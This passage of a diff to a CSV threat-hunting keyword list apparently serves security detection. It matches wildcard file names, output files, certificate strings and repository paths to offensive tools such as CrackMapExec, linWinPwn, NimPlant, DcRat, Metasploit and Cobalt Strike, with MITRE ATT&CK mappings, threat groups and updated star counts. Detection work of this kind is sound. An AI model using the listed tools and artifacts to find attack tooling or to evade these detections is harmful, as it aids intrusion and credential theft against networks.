Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_passpol_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_petitpotam_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_printnightmare_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_runasppl_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
-"*cme_shadowcoerce_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_smb_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_smbsigning_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_subnets_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_trusted-for-delegation_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - 
T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_users_auth_ldap_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_users_auth_smb_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_users_nullsess_smb_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_webdav_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_zerologon_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme-macOS-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme-ubuntu-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme-windows-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*Cmd-Shinject.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Cmd-Upload.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 
implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*cme -d * -*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme -d *localhost*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme*-macOS-latest-*","offensive_tool_keyword","crackmapexec","macOS default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme*-ubuntu-latest-*","offensive_tool_keyword","crackmapexec","ubuntu default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme*-windows-latest-*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme/cme.conf*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme_bloodhound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_dfscoerce_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_get-desc-users_pass_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_get-desc-users_pass_results*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_gpp_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_ldap-checker_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a 
bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_MachineAccountQuota_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_ms17-010_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_mssql_priv_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_ntlmv1_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network 
Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_passpol_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_petitpotam_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_printnightmare_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_runasppl_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
+"*cme_shadowcoerce_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_smb_enum*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_smbsigning_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_subnets_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_trusted-for-delegation_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - 
T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_users_auth_ldap_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_users_auth_smb_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_users_nullsess_smb_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_webdav_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme_zerologon_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*cme-macOS-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme-ubuntu-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*cme-windows-latest-*.zip*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*cmpivot.py*","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","4","344","38","2023-08-25T06:17:23Z","2023-02-20T14:09:42Z" -"*cms400net_default_userpass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*cms400net_default_userpass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*cmVmbGVjdGl2ZQ==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*CN=DcRat Server*OU=qwqdanchun*O=DcRat By qwqdanchun*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*CN=DcRat Server*OU=qwqdanchun*O=DcRat By qwqdanchun*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*CN=PortSwigger*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*CN=ShadowSpray*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*cnotin/SplunkWhisperer2*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" 
@@ -8598,12 +8746,12 @@ "*cobaltstrike/*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 